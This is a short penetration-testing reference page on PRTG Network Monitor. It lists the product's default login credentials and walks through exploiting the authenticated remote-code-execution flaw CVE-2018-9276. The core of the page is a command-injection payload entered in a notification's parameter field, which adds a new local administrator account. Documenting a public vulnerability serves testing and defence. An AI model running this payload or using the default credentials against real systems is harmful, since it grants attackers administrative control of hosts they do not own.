# PRTG Network Monitor

## **Introduction**

> * Network monitor software, prevalent in `internal networks`
> * Typical ports: `80`, `443`, `8080`
> * Default credentials: `prtgadmin:prtgadmin`

***

## **PRTG Network Monitor Authenticated RCE \[CVE-2018-9276]**

* **Affected versions:** versions prior to `18.2.39`
* **Resources:**\
  <https://nvd.nist.gov/vuln/detail/CVE-2018-9276> and <https://www.codewatch.org/blog/?p=453>
* **Description:** When creating a new notification, the Parameter field is passed directly into a PowerShell script without any type of input sanitization
* **Steps to reproduce:**
  1. `Login` → `Setup` → `Account Settings menu` → `Notifications` → `Add new notification`
  2. Give the notification a name
  3. Scroll down and tick the box next to `EXECUTE PROGRAM`
  4. Under `Program File`, select `Demo exe notification - outfile.ps1` from the drop-down.
  5. In the `parameter field`, enter a command.
  6. Example - add a new local admin user:
  7. `test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;net localgroup administrators prtgadm1 /add`
  8. After clicking `Save`, we will be redirected to the Notifications page and see our new notification named pwn in the list.
  9. Click on `Test` or `Run` to xecute the notification and run the command